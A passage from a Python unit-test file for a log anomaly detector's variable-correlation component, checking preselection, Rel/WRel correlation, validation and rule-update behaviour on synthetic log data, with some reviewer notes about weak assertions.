self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random'], percentage_random_cors=1.2)
        # Both ends of the open interval ]0.0, 1.0[ must be rejected as well.
        self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random'], percentage_random_cors=1.0)
        self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random'], percentage_random_cors=0.0)
        self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['random'], percentage_random_cors=-1.2)

    def test7initialize_variables_with_intersect_presel_meth(self):
        """
        Check the intersect_presel_meth flag when two preselection methods, 'excludeDueDistr' and 'matchDiscVals', are combined.
        Four detectors share one EventTypeDetector and see the same atoms: one per single method, one combining both with
        intersect_presel_meth=False and one combining both with intersect_presel_meth=True.
        The assertions compare counts only: the combined detector with intersect_presel_meth=False must hold as many
        candidate correlations as the OR of the two single-method results, the one with intersect_presel_meth=True as many
        as the AND of them.
        """
        t = time()
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd_union = VariableCorrelationDetector(
            self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=[
                'excludeDueDistr', 'matchDiscVals'], intersect_presel_meth=False)
        # NOTE(review): this detector uses disc_div_thres=0.5 while the other three use 0.1 — confirm this is intended,
        # since it changes which variables are treated as discrete before the preselection methods run.
        vcd_intersection = VariableCorrelationDetector(
            self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_presel_meth=[
                'excludeDueDistr', 'matchDiscVals'], intersect_presel_meth=True)
        vcd_exclude = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['excludeDueDistr'])
        vcd_match = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['matchDiscVals'])
        # Four variables over 100 atoms: the root path '/' carries var1, the children '2', '3', '4' carry var2..var4.
        var1 = ['a']*50 + ['b']*50
        var2 = ['a']*90 + ['b']*10
        var3 = ['c']*20 + ['d']*50 + ['e']*30
        var4 = ['c']*50 + ['d']*50
        for i, val in enumerate(var1):
            children = [MatchElement('2', var2[i].encode(), var2[i].encode(), None),
                        MatchElement('3', var3[i].encode(), var3[i].encode(), None),
                        MatchElement('4', var4[i].encode(), var4[i].encode(), None)]
            log_atom = LogAtom(val.encode(), ParserMatch(MatchElement('/', val.encode(), val.encode(), children)), t, self.__class__.__name__)
            etd.receive_atom(log_atom)
        # All four detectors read the same ETD, so the atoms are fed once and init_cor() is called per detector.
        vcd_union.init_cor(0)
        vcd_intersection.init_cor(0)
        vcd_exclude.init_cor(0)
        vcd_match.init_cor(0)
        values_set = [[list(set(var1))] + [list(set(var2))] + [list(set(var3))] + [list(set(var4))]]
        # NOTE(review): assertTrue takes its second argument as the failure message, so this line only checks that the
        # sorted list is non-empty; assertEqual was probably intended. Because list(set(...)) has no fixed element
        # order, a direct assertEqual may additionally need the inner lists sorted — confirm before changing.
        self.assertTrue(sorted(vcd_union.pos_var_val), sorted(values_set))
        # intersect_presel_meth=False -> correlations should be found.
        # the correlation has to be in at least one presel method.
        # (OR-Statement)
        unique_list = deepcopy(vcd_exclude.pos_var_cor[0])
        for cor in vcd_match.pos_var_cor[0]:
            if cor not in unique_list:
                unique_list.append(cor)
        self.assertEqual(len(unique_list), len(vcd_union.pos_var_cor[0]))
        values_set = [[list(set(var1))] + [list(set(var2))] + [list(set(var3))] + [list(set(var4))]]
        # NOTE(review): same assertTrue-with-message issue as above; this does not compare the two lists.
        self.assertTrue(sorted(vcd_intersection.pos_var_val), sorted(values_set))
        # intersect_presel_meth=True -> correlations should still be found.
        # the correlation has to be in both presel methods. (AND-Statement)
        unique_list = []
        for cor in vcd_exclude.pos_var_cor[0]:
            if cor in vcd_match.pos_var_cor[0] and cor not in unique_list:
                unique_list.append(cor)
        for cor in vcd_match.pos_var_cor[0]:
            if cor in vcd_exclude.pos_var_cor[0] and cor not in unique_list:
                unique_list.append(cor)
        self.assertEqual(len(unique_list), len(vcd_intersection.pos_var_cor[0]))

    def test8initialize_variables_with_no_preselection_method(self):
        """
        Check the selection when no preselection method is used, and the Rel and WRel correlation methods.
        For the data generation the main path '/' always contains (i % 10)*1, while the child element contains (i % 10)*1
        for the first half of the data and (i % 10)*2 for the second half.
        The first half of the data contains 10 different values. These values are not combined with other values like in
        the second half of the data, which introduces 5 new values. Therefore 15 combinations exist (5+4+3+2+1=15).
        10 correlations exist when '/' = i*1 -> child = i*1. In the second half 5 new correlations are added when
        '/' = i*1 -> child = i*2.
        """
        t = time()
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, num_init=self.dataset_size)
        values1 = []
        # generate the first half of the data with child elements being (i % 10) * 1 (same value as the main path).
for i in range(self.dataset_size // 2): stat_data = bytes(str((i % 10) * 1), 'utf-8') values1.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) values2 = [] # generate the second half of the data with child elements being (i % 10) * 2. for i in range(self.dataset_size // 2): stat_data = bytes(str((i % 10) * 2), 'utf-8') values2.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) values_set = list(set(values1 + values2)) pos_var_val = deepcopy(vcd.pos_var_val) # all child elements should contain data from values1 and values2. index = pos_var_val[0].index(values_set) del pos_var_val[0][index] # no other element should contain the united set of values1 and values2. self.assertRaises(ValueError, pos_var_val[0].index, values_set) # only values1 should be found, because the main path contains only data generated with (i % 10) * 1. self.assertEqual(pos_var_val, [[list(set(values1))]]) # test the functionality of the Rel and WRel methods # copy both lists to not modify the actual lists of the vcd. rel_list = deepcopy(vcd.rel_list) w_rel_list = deepcopy(vcd.w_rel_list) for rel in rel_list[0]: for r in rel: step = 2 for i in range(len(r)): # skipcq: PTC-W0060 key = (i % 20 >= 10)*10 + ((i % 10) * step) # search for the key k in the relation r or convert key to float if applicable. for k in r: if key == 0.0: break if k != 0.0 and k % key == 0: key = k break value = r[key] # there is no difference between the first half and the second half of the data, when value = 0. 
if key == 0.0: self.assertEqual({key: 10}, value) # as the Rel method can learn only one relation, the values should be 2, 4, 6 and 8 when the key is divisible # by 2 and smaller than 10. elif key % 2 == 0 and key < 10.0: self.assertEqual({key: 4}, value) # as the Rel method can learn only one relation, the values should be 2, 4, 6 and 8 when the key is divisible # by 2 and greater or equal 10. elif key % 2 == 0: self.assertEqual({(key/2): 5}, value) else: raise ValueError('The %f: %f combination must not occur in Rel.' % (key, value)) # relations should be found in both directions and the count should be equal. cnt_half = 0 # for example key = 18.0 -> inner key = 9.0 cnt_double = 0 # for example key = 9.0 -> inner key = 18.0 for w_rel in w_rel_list[0]: for r in w_rel: step = 1.0 # search for the step size for k in r: if k >= 10.0: step = 2.0 if step == 1.0: cnt_half += 1 else: cnt_double += 1 for i in range(len(r)): # skipcq: PTC-W0060 key = (i % 20 >= 10)*10 + ((i % 10) * step) value = r[key] # there is no difference between the first half and the second half of the data, when value = 0. if key == 0.0: self.assertEqual({key: 10}, value) # this if is only reached when step = 2.0. elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif step == 1.0: self.assertEqual({key*2: 5, key: 5}, value) elif step == 2.0: self.assertEqual({key/2: 5, key: 5}, value) else: raise ValueError('The %f: %f combination must not occur in WRel.' 
% (key, value))
        # exactly one relation per direction is expected: one whose keys are halved and one whose keys are doubled.
        self.assertEqual(cnt_half, 1)
        self.assertEqual(cnt_double, 1)

    def test9nonexistent_preselection_methods(self):
        """Check that a ValueError is raised when an unknown preselection method name is configured."""
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=['nonexistentPreselMeth'])

    def test10nonexistent_correlation_methods(self):
        """
        Check that a ValueError is raised when an unknown correlation method name is configured.
        NOTE(review): the original description also mentions an empty list, but only the unknown name is exercised here.
        """
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_cor_meth=['nonexistentCorDMeth'])

    def test11validate_correlation_rules_coverVals(self):
        """
        Check the coverVals validation method.
        validate_cor_cover_vals_thres is tested in the interval [0.1..1.0] in steps of 10%, with h*10 being the threshold
        in percent of the 100 generated atoms. The relation lists are set directly to fixed rel_list/w_rel_list values
        after init_cor(), so the generated atoms only serve to initialize the ETD and the detector.
        If the count of a relation is smaller than h*10, validate_cor() must empty it; otherwise the lists must be left
        unchanged.
        """
        t = time()
        # run test for every 10% of validate_cor_cover_vals_thres
        for h in range(1, 11, 1):
            etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
            vcd = VariableCorrelationDetector(
                self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_validate_cor_meth=['coverVals'],
                validate_cor_cover_vals_thres=0.7, num_init=self.dataset_size)
            # set new validate_cor_cover_vals_thres; the constructor value 0.7 is overwritten for every step.
            vcd.validate_cor_cover_vals_thres = h*0.1
            # init and validate. This is needed as the ETD also needs to be initialized.
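            for i in range(self.dataset_size):
                stat_data = str((i % 10)).encode()
                children = [MatchElement(str(0), stat_data, stat_data, None)]
                log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', stat_data, stat_data, children)), t, self.__class__.__name__)
                etd.receive_atom(log_atom)
            vcd.init_cor(0)
            # overwrite the learned correlations with fixed ones, so that the validation runs on known value counts.
            vcd.rel_list = [[[{9.0: {9.0: 26}, 16.0: {16.0: 13}}, {9.0: {9.0: 26}, 16.0: {16.0: 13}}]]]
            vcd.w_rel_list = [[[{9.0: {9.0: 26}, 16.0: {16.0: 13, 8.0: 5}}, {9.0: {9.0: 26}, 16.0: {16.0: 13, 8.0: 5}}]]]
            vcd.pos_var_cor = [[[0, 1]]]
            old_rel_list = deepcopy(vcd.rel_list[0])
            old_w_rel_list = deepcopy(vcd.w_rel_list[0])
            vcd.validate_cor()
            self.assertEqual(len(old_rel_list), len(vcd.rel_list[0]))
            self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0]))
            for i, rel in enumerate(vcd.rel_list[0]):
                for r in old_rel_list[i]:
                    cnt = 0
                    for key in r:
                        for val in r[key]:
                            cnt += r[key][val]
                    # when the count is smaller than validate_cor_cover_vals_thres in percent, then there should not be any correlations.
                    # h must be multiplied by 10 as it represents 10% steps.
                    if cnt < h * 10:
                        for val in rel:
                            self.assertEqual({}, val)
                    else:
                        self.assertEqual(vcd.rel_list[0], old_rel_list)
            for i, rel in enumerate(vcd.w_rel_list[0]):
                for r in old_w_rel_list[i]:
                    cnt = 0
                    for key in r:
                        for val in r[key]:
                            cnt += r[key][val]
                    # when the count is smaller than validate_cor_cover_vals_thres in percent, then there should not be any correlations.
                    # h must be multiplied by 10 as it represents 10% steps.
                    if cnt < h * 10:
                        for val in rel:
                            self.assertEqual({}, val)
                    else:
                        self.assertEqual(vcd.w_rel_list[0], old_w_rel_list)

    def test12validate_correlation_rules_distinctDistr(self):
        """
        This test case checks the functionality of the distinctDistr validation method.
        The first collection of datasets is similar and therefore produces more correlations.
        The second collection of datasets is not so similar and the number of correlations is smaller.
        The expected correlations can not be compared directly, because the order of the correlations is not guaranteed with the
        distinctDistr validation method.
        To achieve the equality test, both correlation variables are compared to [[], [], []] after all existing correlations are removed.
        """
        t = time()
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(
            self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=['distinctDistr'],
            validate_cor_distinct_thres=0.05, num_init=self.dataset_size)
        # init and validate
        similar_data1 = ['a']*50 + ['b']*20 + ['c']*25 + ['d']*5
        similar_data2 = ['a']*45 + ['b']*25 + ['c']*15 + ['d']*10 + ['e']*5
        similar_data3 = ['a']*55 + ['b']*15 + ['c']*20 + ['d']*10
        unsimilar_data1 = ['a']*50 + ['b']*20 + ['c']*25 + ['d']*5
        unsimilar_data2 = ['a']*10 + ['b']*15 + ['c']*15 + ['d']*10 + ['e']*50
        unsimilar_data3 = ['a']*25 + ['b']*15 + ['c']*50 + ['d']*10
        for i in range(self.dataset_size):
            children = [MatchElement(str(1), similar_data2[i].encode(), similar_data2[i].encode(), None),
                        MatchElement(str(2), similar_data3[i].encode(), similar_data3[i].encode(), None)]
            # the raw data of the atom is passed as bytes, consistent with the other tests of this file.
            log_atom = LogAtom(similar_data1[i].encode(), ParserMatch(MatchElement(
                '/', similar_data1[i].encode(), similar_data1[i].encode(), children)), t, self.__class__.__name__)
            etd.receive_atom(log_atom)
        vcd.init_cor(0)
        old_w_rel_list = deepcopy(vcd.w_rel_list[0])
        vcd.validate_cor()
        self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0]))
        expected_similar_correlations = [[{
            'd': {'e': 5}, 'c': {'d': 10, 'c': 15}, 'b': {'b': 20}, 'a': {'b': 5, 'a': 45}}, {
            'e': {'d': 5}, 'd': {'c': 10}, 'c': {'c': 15}, 'b': {'b': 20, 'a': 5}, 'a': {'a': 45}}], [{
            'd': {'d': 5}, 'c': {'d': 5, 'c': 20}, 'b': {'b': 15, 'a': 5}, 'a': {'a': 50}}, {
            'd': {'d': 5, 'c': 5}, 'c': {'c': 20}, 'b': {'b': 15}, 'a': {'b': 5, 'a': 50}}], [{
            'e': {'d': 5}, 'd': {'d': 5, 'c': 5}, 'c': {'c': 15}, 'b': {'b': 15, 'a': 10}, 'a': {'a': 45}}, {
            'd': {'e': 5, 'd': 5}, 'c': {'d': 5, 'c': 15}, 'b': {'b': 15}, 'a': {'b': 10, 'a': 45}}]]
        # every found correlation is removed from the expected ones; the order of the correlations is not guaranteed.
        for w_rel in vcd.w_rel_list[0]:
            for cor in w_rel:
                deleted = False
                for expected_similar_correlation in expected_similar_correlations:
                    if cor in expected_similar_correlation:
                        index = expected_similar_correlation.index(cor)
                        del expected_similar_correlation[index]
                        deleted = True
                        break
                # if the correlation was not deleted an error is raised and the test fails.
                if not deleted:
                    raise ValueError('Correlation %s could not be found in the WRel List.' % cor)
        self.assertEqual([[], [], []], expected_similar_correlations)

        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        # NOTE(review): the vtd only receives the atoms below, nothing is asserted on it - presumably kept to mirror a full pipeline.
        vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1,
                                   test_gof_int=True, sim_thres=0.1, gof_alpha=self.significance_niveau)
        vcd = VariableCorrelationDetector(
            self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=['distinctDistr'],
            validate_cor_distinct_thres=0.05, num_init=self.dataset_size)
        for i in range(self.dataset_size):
            children = [MatchElement(str(1), unsimilar_data2[i].encode(), unsimilar_data2[i].encode(), None),
                        MatchElement(str(2), unsimilar_data3[i].encode(), unsimilar_data3[i].encode(), None)]
            log_atom = LogAtom(unsimilar_data1[i].encode(), ParserMatch(MatchElement(
                '/', unsimilar_data1[i].encode(), unsimilar_data1[i].encode(), children)), t, self.__class__.__name__)
            etd.receive_atom(log_atom)
            vtd.receive_atom(log_atom)
        vcd.init_cor(0)
        old_w_rel_list = deepcopy(vcd.w_rel_list[0])
        vcd.validate_cor()
        self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0]))
        expected_unsimilar_correlations = [[
            {}, {'a': {'a': 10}, 'b': {'a': 15}, 'c': {'a': 15}, 'd': {'a': 10}, 'e': {'b': 20, 'c': 25, 'd': 5}}], [
            {}, {'a': {'a': 25}, 'b': {'a': 15}, 'd': {'c': 5, 'd': 5}}], [
            {'a': {'a': 10}, 'b': {'a': 15}, 'c': {'b': 15}, 'd': {'c': 10}, 'e': {'c': 40, 'd': 10}}, {
            'a': {'a': 10, 'b': 15}, 'b': {'c': 15}, 'c': {'d': 10, 'e': 40}, 'd': {'e': 10}}]]
        for w_rel in vcd.w_rel_list[0]:
            for cor in w_rel:
                deleted = False
                for expected_unsimilar_correlation in expected_unsimilar_correlations:
                    if cor in expected_unsimilar_correlation:
                        index = expected_unsimilar_correlation.index(cor)
                        del expected_unsimilar_correlation[index]
                        deleted = True
                        break
                # if the correlation was not deleted an error is raised and the test fails.
                if not deleted:
                    raise ValueError('Correlation %s could not be found in the WRel List.%s' % (cor, vcd.w_rel_list[0]))
        self.assertEqual([[], [], []], expected_unsimilar_correlations)

    def test13validate_correlation_rules_distinctDistr_without_WRel(self):
        """This test case checks if an error occurs, when using the distinctDistr validation method without the WRel correlation method."""
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd,
                          disc_div_thres=0.1, used_cor_meth=['Rel'], used_validate_cor_meth=['distinctDistr'])

    def test14nonexistent_validation_method(self):
        """This test case checks if an error occurs, when using an nonexistent validation method or empty list."""
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd,
                          disc_div_thres=0.1, used_validate_cor_meth=['nonexistentValidateCorDMeth'])

    def test15update_and_test_correlation_rules_with_rel_correlation_method(self):
        """
        This test case checks the functionality of the Rel correlation method in the update, correlation generation and test phases.
        The correlations are initialized with 10 values for each correlation and keys calculated with (i % 10) * 0.1.
        In the update phase keys are calculated with (i % 10) * 0.2.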
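        Due to that the existing value's count must stay the same in cases where new values are not created and new values must be created
        from 1.0 to 1.8. Values are increased by or created with a count of 10.
        """
        description = 'test15VCD1'
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5,
                                          used_cor_meth=['Rel'], num_init=self.dataset_size)
        self.analysis_context.register_component(vcd, description)
        self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True)
        for rel in vcd.rel_list[0]:
            for r in rel:
                for i in r:
                    key = i
                    value = r[key]
                    # existing values which are divisible by 2 and smaller than 10.0 should be updated.
                    if key % 2 == 0 and key < 10.0:
                        self.assertEqual({key: 20}, value)
                    # new values which are divisible by 2 and greater than 10.0 should be created.
                    # other values should stay the same as before.
                    else:
                        self.assertEqual({key: 10}, value)

        description = 'test15VCD2'
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5,
                                          used_cor_meth=['Rel'], num_init=self.dataset_size)
        self.analysis_context.register_component(vcd, description)
        self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False)
        for rel in vcd.rel_list[0]:
            for r in rel:
                for i in r:
                    key = i
                    value = r[key]
                    # no new values should be created.
                    self.assertFalse(key % 2 == 0 and key >= 10.0)
                    # existing values which are divisible by 2 and smaller than 10.0 should be updated.
                    if key % 2 == 0 and key < 10.0:
                        self.assertEqual({key: 20}, value)
                    # other values should stay the same as before.
                    else:
                        self.assertEqual({key: 10}, value)

        description = 'test15VCD3'
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5,
                                          used_cor_meth=['Rel'], num_init=self.dataset_size)
        self.analysis_context.register_component(vcd, description)
        old_rel_list = self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=False, generate_rules=False)
        # no values in the rel_list should be changed.
        self.assertEqual(vcd.rel_list[0], old_rel_list)

        description = 'test15VCD4'
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5,
                                          used_cor_meth=['Rel'], num_init=self.dataset_size)
        self.analysis_context.register_component(vcd, description)
        offset = 200
        self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False, offset=offset)
        # old correlations from child elements with the value being divisible by 2 should be deleted. The first ten correlations from the
        # initialization phase were not touched and should remain the same. The other correlation however should delete every value which
        # is divisible by 2.
        rel_list = deepcopy(vcd.rel_list[0])
        # delete correlations from the init phase.
        for rel in vcd.rel_list[0]:
            if rel[0] == rel[1]:
                index = rel_list.index(rel)
                del rel_list[index]
        self.assertEqual(1, len(rel_list))
        for rel in rel_list:
            # the order of the correlations is not guaranteed.
            if len(rel[0]) > len(rel[1]):
                rel0 = rel[0]
                rel1 = rel[1]
            else:
                rel0 = rel[1]
                rel1 = rel[0]
            for i in rel0:
                key = i
                value = rel0[key]
                self.assertEqual({key: 10}, value)
            for i in rel1:
                key = i
                value = rel1[key]
                # no values divisible by 2 should exist.
                self.assertFalse(key % 2 == 0)
                self.assertEqual({key: 10}, value)

    def update_or_test_with_rel_correlation_method(self, etd, vcd, update_rules, generate_rules, offset=0):
        """
        Run the update or test of rel correlations.

        The vcd is initialized with self.dataset_size atoms whose child element is (i % 10) * 1, the initial correlations are asserted to
        hold 10 values each and afterwards self.dataset_size atoms with child element (i % 10) * 2 + offset are fed into the update phase.
        @param etd the EventTypeDetector the atoms are passed to.
        @param vcd the VariableCorrelationDetector under test; its update_rules and generate_rules flags for event type 0 are set here.
        @param update_rules value set for vcd.update_rules[0] before the update phase.
        @param generate_rules value set for vcd.generate_rules[0] before the update phase.
        @param offset added to every child value of the update phase.
        @return a deep copy of vcd.rel_list[0] taken after the initialization and before the update phase.
        """
        t = time()
        # generate the initialization data with child elements being (i % 10) * 1.
        for i in range(self.dataset_size):
            stat_data = bytes(str((i % 10) * 1), 'utf-8')
            children = [MatchElement(str(0), stat_data, stat_data, None)]
            log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', stat_data, stat_data, children)), t, self.__class__.__name__)
            etd.receive_atom(log_atom)
        vcd.init_cor(0)
        # test if the initialization contains only correlations with 10 values.
        for rel in vcd.rel_list[0]:
            for r in rel:
                for i in r:
                    key = i
                    value = r[key]
                    self.assertEqual({key: 10}, value)
        old_rel_list = deepcopy(vcd.rel_list[0])
        # generate the update data with child elements being (i % 10) * 2; the root element stays without offset.
        for i in range(self.dataset_size):
            stat_data = bytes(str((i % 10) * 2 + offset), 'utf-8')
            children = [MatchElement(str(0), stat_data, stat_data, None)]
            log_atom = LogAtom(stat_data, ParserMatch(MatchElement(
                '/', str((i % 10) * 2).encode(), str((i % 10) * 2).encode(), children)), t, self.__class__.__name__)
            etd.receive_atom(log_atom)
        # the vcd reports on the last atom it has seen, so it must be set before the update phase runs.
        vcd.log_atom = log_atom
        vcd.update_rules[0] = update_rules
        vcd.generate_rules[0] = generate_rules
        vcd.update_or_test_cor(0)
        return old_rel_list

    def test16update_and_test_correlation_rules_with_w_rel_correlation_method(self):
        """
        This test case checks the functionality of the WRel correlation method in the update, correlation generation and test phases.
        The correlations are initialized with 70% of the values having (i % 10) * 0.1 and 30% of the values having (i % 10) * 0.2.
        In the update phase the ratio is changed from 70:30 to 80:20. Thus the expected ratio is 75:25, when update_rules=True without offset.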
""" # This part tests if rules are updated when update_rules=True and generate_rules=True, however no new rules are generated as the # same data is passed on in the update process. description = 'test16VCD1' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 20}, value) elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 5, key: 15}, {key*2: 5, key: 15})) else: self.assertTrue(value in ({key: 15}, {key*2: 5, key: 15})) # This part tests if rules are updated when update_rules=True and generate_rules=False. Therefore the assumptions of correlations is # the same as above, because there were no new correlations generated due to the same data being used. 
description = 'test16VCD2' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 20}, value) elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 5, key: 15}, {key*2: 5, key: 15})) else: self.assertTrue(value in ({key: 15}, {key*2: 5, key: 15})) # This part tests if rules are updated when update_rules=False and generate_rules=False. No correlation should be changed. description = 'test16VCD3' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) old_w_rel_list = self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=False, generate_rules=False) # no values in the rel_list should be changed. self.assertEqual(vcd.w_rel_list[0], old_w_rel_list) # This part tests if rules are updated when update_rules=True and generate_rules=False but with an offset of 200. Therefore the # assumptions of correlations for the first part should stay the same and no new correlations should be learned, because an offset # is added to all data. 
description = 'test16VCD4' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) offset = 200 self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False, offset=offset) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertTrue(value in ({key: 10}, {key: 10, float(offset): 2})) elif key >= 10.0: self.assertEqual({key / 2: 3}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 3, key: 7, key*2+offset: 2})) else: self.assertTrue(value in ({key: 7}, {key*2: 3, key: 7, key*2+offset: 2})) # This part tests if rules are updated when update_rules=True and generate_rules=True but with an offset of 200. Therefore the # assumptions of correlations for the first part should stay the same and new correlations should be learned, because an offset # is added to all data. 
description = 'test16VCD5' etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=['WRel'], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.analysis_context.register_component(vcd, description) offset = 200 self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True, offset=offset) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertTrue(value in ({key: 10}, {key: 0, float(offset): 2})) elif key >= 10.0: self.assertTrue(value in ({(key-offset)/2: 2}, {key/2: 3}, {(key-offset)/2: 2, key: 8}, {key: 8})) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 0, key: 0, key*2+offset: 2})) else: self.assertTrue(value in ({key: 7}, {key*2: 0, key: 0, key*2+offset: 2})) def update_or_test_with_w_rel_correlation_method(self, etd, vcd, update_rules, generate_rules, offset=0): """ Run the update or test of w_rel correlations. This method initializes the vcd with a distribution of 70% 0.1 and 30% 0.2. In the update phase the distribution is 80% 1 and 20% 2. """ t = time() values = [] # generate the initialization data with child elements being (i % 10) * 1. 
